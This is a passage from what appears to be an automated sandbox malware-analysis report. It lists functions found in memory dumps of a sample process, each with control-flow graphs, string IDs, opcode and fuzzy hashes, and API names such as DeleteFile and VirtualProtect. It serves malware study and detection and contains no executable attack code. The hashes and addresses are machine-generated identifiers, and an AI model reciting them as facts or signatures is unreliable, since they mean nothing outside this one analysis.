                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: XOx$XOx
                                                                        • API String ID: 0-3878675519
                                                                        • Opcode ID: 5059880750bdaa60b76465525d7294b9397d6bb2672149f53e06d5dc9a00bd5b
                                                                        • Instruction ID: 989c81b41fe3c6526cf802cc98eec5c76256f4da2b59c966c25eba845e3493ea
                                                                        • Opcode Fuzzy Hash: 5059880750bdaa60b76465525d7294b9397d6bb2672149f53e06d5dc9a00bd5b
                                                                        • Instruction Fuzzy Hash: 7FB1F4A1B0DA4A4FE79AD62D945A2B577D2EF89710F5401BFE44EC32D3DD18AC038392
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5AAF31 Relevance: 2.8, Strings: 2, Instructions: 349COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1201 7ffbac5aaf31-7ffbac5aaf68 1204 7ffbac5ab089-7ffbac5ab095 1201->1204 1205 7ffbac5aaf6e-7ffbac5aaf70 1201->1205 1210 7ffbac5ab097-7ffbac5ab0ab 1204->1210 1211 7ffbac5ab0ac-7ffbac5ab0bb 1204->1211 1206 7ffbac5aaf76-7ffbac5aaf83 1205->1206 1207 7ffbac5ab0c2-7ffbac5ab0ce 1205->1207 1217 7ffbac5aaf85-7ffbac5aaf92 1206->1217 1218 7ffbac5aaf98-7ffbac5aafae 1206->1218 1213 7ffbac5ab0e5-7ffbac5ab0f4 1207->1213 1214 7ffbac5ab0d0-7ffbac5ab0e4 1207->1214 1210->1211 1211->1207 1223 7ffbac5ab0fb-7ffbac5ab106 1213->1223 1214->1213 1217->1218 1217->1223 1218->1223 1224 7ffbac5aafb4-7ffbac5aafc9 1218->1224 1226 7ffbac5ab109-7ffbac5ab11d 1223->1226 1227 7ffbac5ab11e-7ffbac5ab12d 1223->1227 1230 7ffbac5ab134-7ffbac5ab1c5 1224->1230 1231 7ffbac5aafcf-7ffbac5aaffe call 7ffbac5a75f0 1224->1231 1226->1227 1227->1230 1254 7ffbac5ab1c9-7ffbac5ab207 1230->1254 1255 7ffbac5ab1c7 1230->1255 1242 7ffbac5ab015-7ffbac5ab020 1231->1242 1243 7ffbac5ab000-7ffbac5ab00d 1231->1243 1249 7ffbac5ab027-7ffbac5ab02c 1242->1249 1246 7ffbac5ab014 1243->1246 1246->1242 1251 7ffbac5ab02e-7ffbac5ab039 1249->1251 1252 7ffbac5ab062-7ffbac5ab088 call 7ffbac5a91f0 call 7ffbac5aac40 1249->1252 1257 7ffbac5ab03c-7ffbac5ab050 1251->1257 1258 7ffbac5ab051-7ffbac5ab05c 1251->1258 1259 7ffbac5ab209-7ffbac5ab212 1254->1259 1255->1254 1255->1259 1257->1258 1258->1252
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: HJx$XOx
                                                                        • API String ID: 0-51357738
                                                                        • Opcode ID: 5e3ae69d98ed1d242ee2e8faaae67d8e4b281d66d69b70c337249627dcba0dd5
                                                                        • Instruction ID: 9789bd2c0292fbcd16e7c1fc2eeb9ed74d09e3d2f0d6695c46313f0debd314b3
                                                                        • Opcode Fuzzy Hash: 5e3ae69d98ed1d242ee2e8faaae67d8e4b281d66d69b70c337249627dcba0dd5
                                                                        • Instruction Fuzzy Hash: 5691E5F1B1EA4A4FEB96E73DD45E67567D1EF99210B4801FAE44EC7292DD18EC028380
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC1E14F6 Relevance: 2.6, Strings: 2, Instructions: 80COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1266 7ffbac1e14f6-7ffbac1e1502 1268 7ffbac1e1508-7ffbac1e150e 1266->1268 1269 7ffbac1e15a5-7ffbac1e15af 1266->1269 1272 7ffbac1e152a-7ffbac1e1547 1268->1272 1273 7ffbac1e1510-7ffbac1e1523 1268->1273 1270 7ffbac1e15c0-7ffbac1e163a 1269->1270 1271 7ffbac1e15b1-7ffbac1e15bf 1269->1271 1293 7ffbac1e163c-7ffbac1e1689 1270->1293 1294 7ffbac1e168e-7ffbac1e16bb 1270->1294 1272->1269 1277 7ffbac1e1549-7ffbac1e154f 1272->1277 1273->1272 1279 7ffbac1e1551-7ffbac1e156c 1277->1279 1280 7ffbac1e156e 1277->1280 1279->1280 1283 7ffbac1e1573-7ffbac1e157c 1280->1283 1286 7ffbac1e1595-7ffbac1e15a4 1283->1286 1287 7ffbac1e157e-7ffbac1e158b 1283->1287 1287->1286 1290 7ffbac1e158d-7ffbac1e1593 1287->1290 1290->1286 1293->1294 1301 7ffbac1e16c2-7ffbac1e16d3 1294->1301 1302 7ffbac1e16bd 1294->1302 1304 7ffbac1e16da-7ffbac1e1769 1301->1304 1305 7ffbac1e16d5 1301->1305 1302->1301 1303 7ffbac1e16bf 1302->1303 1303->1301 1312 7ffbac1e1da5-7ffbac1e1dfe 1304->1312 1313 7ffbac1e176f-7ffbac1e1779 1304->1313 1305->1304 1307 7ffbac1e16d7 1305->1307 1307->1304 1314 7ffbac1e1792-7ffbac1e179a 1313->1314 1315 7ffbac1e177b-7ffbac1e1790 1313->1315 1314->1312 1317 7ffbac1e17a0-7ffbac1e17aa 1314->1317 1315->1314 1319 7ffbac1e17c3-7ffbac1e17cb 1317->1319 1320 7ffbac1e17ac-7ffbac1e17c1 1317->1320 1319->1312 1324 7ffbac1e17d1-7ffbac1e17e5 1319->1324 1320->1319 1328 7ffbac1e17e8-7ffbac1e17fe 1324->1328 1329 7ffbac1e1800-7ffbac1e1835 1328->1329 1330 7ffbac1e183c-7ffbac1e1895 1328->1330 1329->1330 1340 7ffbac1e1d75-7ffbac1e1d7a 1330->1340 1341 7ffbac1e189b-7ffbac1e18a5 1330->1341 1340->1328 1342 7ffbac1e18a7-7ffbac1e18b4 1341->1342 1343 7ffbac1e18be-7ffbac1e18d4 1341->1343 1342->1343 1347 7ffbac1e18b6-7ffbac1e18bc 1342->1347 1347->1343
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.686347845.00007FFBAC1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac1e0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: gy$gy
                                                                        • API String ID: 0-417113342
                                                                        • Opcode ID: b722a732a13b2f2fa7eadbdbe24d8c93a04a610705ba997a85eef38bf7938f0d
                                                                        • Instruction ID: 908a28cf2b751e075b8748f5bbb9a72815c69d34d948bba34eb65b0a7d77f20e
                                                                        • Opcode Fuzzy Hash: b722a732a13b2f2fa7eadbdbe24d8c93a04a610705ba997a85eef38bf7938f0d
                                                                        • Instruction Fuzzy Hash: A211EBE2F1EA164FFAABD22C54151B856D2EF46210B5811BFD90FC7297DD0CDC05C249
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC11C88D Relevance: 1.7, APIs: 1, Instructions: 210COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.685907097.00007FFBAC110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC110000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac110000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3474439df4bc032862aa079e32ee9870c9a7d7dbecdb70cd6f3228509eb5aea1
                                                                        • Instruction ID: 59943916fc18d5dc29607f9e861cbbdd0d6ecfb3470eba589150bb22303a6047
                                                                        • Opcode Fuzzy Hash: 3474439df4bc032862aa079e32ee9870c9a7d7dbecdb70cd6f3228509eb5aea1
                                                                        • Instruction Fuzzy Hash: A651497190DB884FD706DB7888596F9BFE0EF56310B0842BFD089D71A3DA28A84BC751
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5ADB30 Relevance: 1.7, Strings: 1, Instructions: 457COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: gy
                                                                        • API String ID: 0-2028992370
                                                                        • Opcode ID: 0aadd9dd90202391b51a3213d28ef631a26b9c360018eccfdc469d34606da6a0
                                                                        • Instruction ID: e2d7828f0ae1c609a2e48385552ed61d8d3fab3dc7004d1b5ed273a3940a5eaf
                                                                        • Opcode Fuzzy Hash: 0aadd9dd90202391b51a3213d28ef631a26b9c360018eccfdc469d34606da6a0
                                                                        • Instruction Fuzzy Hash: 6DD195B06199494FDB89EB2CC45DA797BD1FF59310B1501BAE84ECB2A3DE24EC42CB41
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC11ACAC Relevance: 1.6, APIs: 1, Instructions: 125memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.685907097.00007FFBAC110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC110000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac110000_allah.jbxd
                                                                        Similarity
                                                                        • API ID: ProtectVirtual
                                                                        • String ID:
                                                                        • API String ID: 544645111-0
                                                                        • Opcode ID: 898b657b336d90ce925a6a8f7d6c28320f8bf02668b7e42612413eb6c639e997
                                                                        • Instruction ID: 74d003f045dd685882b2eacfb8d22317f7724f0881a48c4b929b8bdd8131accd
                                                                        • Opcode Fuzzy Hash: 898b657b336d90ce925a6a8f7d6c28320f8bf02668b7e42612413eb6c639e997
                                                                        • Instruction Fuzzy Hash: 7C31167190CB5C4FDB19DB6C980A6ED7BE1EB95321F04436FE049D3292CA74A806C792
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5AE813 Relevance: 1.6, Strings: 1, Instructions: 361COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: HJx
                                                                        • API String ID: 0-98221368
                                                                        • Opcode ID: 66fe844af0d9b3edf0872cd29ebef5527788e058f55566d050971fe41c8e0ac7
                                                                        • Instruction ID: 584349be46635513be5b89c6d3e631cfd81bff1585355136354e60cefd713823
                                                                        • Opcode Fuzzy Hash: 66fe844af0d9b3edf0872cd29ebef5527788e058f55566d050971fe41c8e0ac7
                                                                        • Instruction Fuzzy Hash: 5CB192B0A18A1D8FDB98EB29D44DBB977E1FF99310F04417AE45EC3292DE34E8418B41
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC11C96D Relevance: 1.6, APIs: 1, Instructions: 108fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.685907097.00007FFBAC110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC110000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac110000_allah.jbxd
                                                                        Similarity
                                                                        • API ID: DeleteFile
                                                                        • String ID:
                                                                        • API String ID: 4033686569-0
                                                                        • Opcode ID: 48aff3e99a3fa8090156df90778536c95f06f50005a18576594712fbb85f6f45
                                                                        • Instruction ID: 4fef6d4918e8a135fbcbf29f92a82303714b5e9439b947c7898b02958e928772
                                                                        • Opcode Fuzzy Hash: 48aff3e99a3fa8090156df90778536c95f06f50005a18576594712fbb85f6f45
                                                                        • Instruction Fuzzy Hash: 7431FE7190CB1C8FDB19DB68D849AE9BBF0EF65311F04422FD04AD3262DB74A846CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5A8B71 Relevance: 1.6, Strings: 1, Instructions: 354COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: HJx
                                                                        • API String ID: 0-98221368
                                                                        • Opcode ID: a14325dbbddeaae1a60f9fcd054aa20db341e51437b3d311720e08f1f69d5f39
                                                                        • Instruction ID: b02a7c1312af9c365be23461737e604e3017e9c0de53321b30efb362cb4e570b
                                                                        • Opcode Fuzzy Hash: a14325dbbddeaae1a60f9fcd054aa20db341e51437b3d311720e08f1f69d5f39
                                                                        • Instruction Fuzzy Hash: E7B109B160DA8A4FE766E778D8AA5B47BE0EF56310B0801FBD48DCF193D91DAC468341
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5AD079 Relevance: 1.5, Strings: 1, Instructions: 289COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (;y
                                                                        • API String ID: 0-1926527261
                                                                        • Opcode ID: 5a241b6def18b7efbb5684da0fe1b68ccf1f55ac169fe2549104dc1ad98ee911
                                                                        • Instruction ID: 39039fcaaffb2b55665f2633a15d2b1eba560ac5827d58362a8e448823e7ada8
                                                                        • Opcode Fuzzy Hash: 5a241b6def18b7efbb5684da0fe1b68ccf1f55ac169fe2549104dc1ad98ee911
                                                                        • Instruction Fuzzy Hash: 0591D2A0A096894FE756EB39C45D7B97BD1EF59304F5441BDE88ECB2D3CE28E8468700
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5AD0B3 Relevance: 1.5, Strings: 1, Instructions: 256COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (;y
                                                                        • API String ID: 0-1926527261
                                                                        • Opcode ID: 421555a0318cff76bf972053a631fd42ef7fa3e8689651616abaf61894b17293
                                                                        • Instruction ID: 3175ed64876fa62bc49642116ddda92d12210537756c7a828e1122e758a57f04
                                                                        • Opcode Fuzzy Hash: 421555a0318cff76bf972053a631fd42ef7fa3e8689651616abaf61894b17293
                                                                        • Instruction Fuzzy Hash: C18180A0A09A494FE75AEB3DC4597A97BD1EF58300F5441BDE88ECB2D3CD2CE8468750
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5B1B74 Relevance: 1.4, Strings: 1, Instructions: 197COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 8Lx
                                                                        • API String ID: 0-1785225494
                                                                        • Opcode ID: 3246c0dc6b93de40e93ad1e8ac2cbca08cb56770e5de4018303af924c44e25ff
                                                                        • Instruction ID: 39c6c467877c8cdeaed3df79452bcec6fe52525c195c3795df1f08b43f71410a
                                                                        • Opcode Fuzzy Hash: 3246c0dc6b93de40e93ad1e8ac2cbca08cb56770e5de4018303af924c44e25ff
                                                                        • Instruction Fuzzy Hash: 44519EB1B189498FDB89EF2CC495AA977D2FF9C310B1401B9E44ED7296DE24EC06C784
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5AB84A Relevance: 1.4, Strings: 1, Instructions: 171COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: HJx
                                                                        • API String ID: 0-98221368
                                                                        • Opcode ID: 4a810b193c7bf6e05dfeb261b77934aba2a2ebceea184b7b2546a9e37ba15e19
                                                                        • Instruction ID: deff9c4054b27fda1d4c52a0db7e8a445847674896c5909c17f0997be71b93ad
                                                                        • Opcode Fuzzy Hash: 4a810b193c7bf6e05dfeb261b77934aba2a2ebceea184b7b2546a9e37ba15e19
                                                                        • Instruction Fuzzy Hash: 8D417CB1A0EA8A0FE796E23D849A1B57BD1EF45210B4801FBE44DC72A3DD08EC078385
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5AAD4E Relevance: 1.4, Strings: 1, Instructions: 163COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: XOx
                                                                        • API String ID: 0-1393043532
                                                                        • Opcode ID: a707dd93cb1be8cadf9c5222ae1676f79277459d2f1ada9c4f76730927582bd9
                                                                        • Instruction ID: 1539fe45f6d41a8f7e7acbdbff99cd9af986bdd82f2f3cbaa583296e4e0d6f92
                                                                        • Opcode Fuzzy Hash: a707dd93cb1be8cadf9c5222ae1676f79277459d2f1ada9c4f76730927582bd9
                                                                        • Instruction Fuzzy Hash: DD418AA2A1DA8A0FE767873DD45E1B43BD1EF85310B0805FBE48EC7197DD08E8468781
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC1E120A Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.686347845.00007FFBAC1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac1e0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: gy
                                                                        • API String ID: 0-2028992370
                                                                        • Opcode ID: 2f16314e4e8d5f01d92d388b90cc7d8773791154fa740fce6df89b64d3d519df
                                                                        • Instruction ID: a5230256785f3e473346f363c04ae7172e8d5fe0a5bb03adf671004ab2219ae2
                                                                        • Opcode Fuzzy Hash: 2f16314e4e8d5f01d92d388b90cc7d8773791154fa740fce6df89b64d3d519df
                                                                        • Instruction Fuzzy Hash: A60128A2F1AD1B4BEAA7D22C98551B9B2E2DF4961077401BAC80EC3193CE0CEC064385
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC1E617B Relevance: 1.3, Strings: 1, Instructions: 46COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.686347845.00007FFBAC1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac1e0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: x,x
                                                                        • API String ID: 0-3115053579
                                                                        • Opcode ID: 2ab2ee0c9e1bedc0f426ff8f33b9e356ec65b27f5435b8faf70efe6ebf8b77df
                                                                        • Instruction ID: c0fe3a37cb8493cca15f8474b13e2e569e1549b53d2f227df3b45109ac4323c7
                                                                        • Opcode Fuzzy Hash: 2ab2ee0c9e1bedc0f426ff8f33b9e356ec65b27f5435b8faf70efe6ebf8b77df
                                                                        • Instruction Fuzzy Hash: 44F090B2B1CA084FEB5DEB1C98161B9B3D2EBC9126744427FD14EC3562DA2198064744
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5ACDF4 Relevance: .5, Instructions: 503COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 48c89f55550770810db7e353b074b65633a004f61ef4af8fdef75ce02c04531e
                                                                        • Instruction ID: 92f8490199b878fafbf8516dc5c664ef4e16971de950af5bbb8fa63a080551f9
                                                                        • Opcode Fuzzy Hash: 48c89f55550770810db7e353b074b65633a004f61ef4af8fdef75ce02c04531e
                                                                        • Instruction Fuzzy Hash: 1CF1FAB0A09A494FE759EB2DC45A7B977E1FF59310F5401BEE84EC7292CE38E8468740
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5A7645 Relevance: .3, Instructions: 347COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 55f6e78d8d39ee2fa78fed563bc9e9356a3595c34e28cc4292b934da839a376a
                                                                        • Instruction ID: b1837e831088a8009a7bd4c840de977b984a1842a52143b130485cfdab1668ad
                                                                        • Opcode Fuzzy Hash: 55f6e78d8d39ee2fa78fed563bc9e9356a3595c34e28cc4292b934da839a376a
                                                                        • Instruction Fuzzy Hash: 54B1B7B1A1D6498FDB5AEB38D45A6F977E1FF88350F14017EE85EC7182DE28E8128740
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5ACF4D Relevance: .3, Instructions: 333COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 841c013931d2b6849791f7de62616d5c2fc169462510d30dbe5a8fef8259eba6
                                                                        • Instruction ID: 735d4ef2179163b2862a44531a0703ea757844f9b8e9b77ec77e2b30e8a7e94d
                                                                        • Opcode Fuzzy Hash: 841c013931d2b6849791f7de62616d5c2fc169462510d30dbe5a8fef8259eba6
                                                                        • Instruction Fuzzy Hash: 8AB113E0A096854FE756AB3DC45D7A87BD0EF59310F5441BEE88ECB2D3DA2CE8468700
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5AD133 Relevance: .3, Instructions: 293COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2e45f9695bfc0a3081a56441cb91406c5705b4b730ff3b8252bfe3c0c31abcec
                                                                        • Instruction ID: a1fe4e637edfd452fee20bf1f454055d6be3738bbd29cc01e832b9653e059b56
                                                                        • Opcode Fuzzy Hash: 2e45f9695bfc0a3081a56441cb91406c5705b4b730ff3b8252bfe3c0c31abcec
                                                                        • Instruction Fuzzy Hash: 75A1C3B0A09A494FEB55EB2DC459769B7E1EF58300F5441BDE88EC72D2CE38E8868741
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5A7A90 Relevance: .3, Instructions: 275COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c7b796d2b7e93056f773937a5adf78f3fdc58828feb7589b5ef4946af5f64a25
                                                                        • Instruction ID: 01fa67aeea12d3138d65b515902292eccbd5936efc220d3c78fdf9a9d9f8cbe7
                                                                        • Opcode Fuzzy Hash: c7b796d2b7e93056f773937a5adf78f3fdc58828feb7589b5ef4946af5f64a25
                                                                        • Instruction Fuzzy Hash: F38106B1A19A4D8FD7A5EB79D45A6B577E1EF58310F0405BEE84EC3292DE24E8418380
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5ACFA0 Relevance: .3, Instructions: 273COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8f975b4f47d3bff2bcf7f6cb93fdf0709728231d3f3b3d4588b370a5221574d1
                                                                        • Instruction ID: e3c0863e2bae3665ecdb3fd4ed4ae0d495d2798662a578f1586f7137623ffdfd
                                                                        • Opcode Fuzzy Hash: 8f975b4f47d3bff2bcf7f6cb93fdf0709728231d3f3b3d4588b370a5221574d1
                                                                        • Instruction Fuzzy Hash: F691E1A0A096894FE756AB3DC4597A977D1EF59300F5441BDE88ECB2D3CE2CE8468710
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5A7418 Relevance: .3, Instructions: 264COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b55cbe84d58501b39eb62538cdc35e4e40d5146f5a701cd4eecee6c0b89e03d0
                                                                        • Instruction ID: dd85f67e43ac8f740237b51b3f5eb5eb790fbafb16e9f65debbf3f0d809e0da2
                                                                        • Opcode Fuzzy Hash: b55cbe84d58501b39eb62538cdc35e4e40d5146f5a701cd4eecee6c0b89e03d0
                                                                        • Instruction Fuzzy Hash: 8C814BB190E5898FD756EB39D45F4A97FD0FF49340B0401BAE48EC76A2EA24D806C781
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5AD03E Relevance: .3, Instructions: 255COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
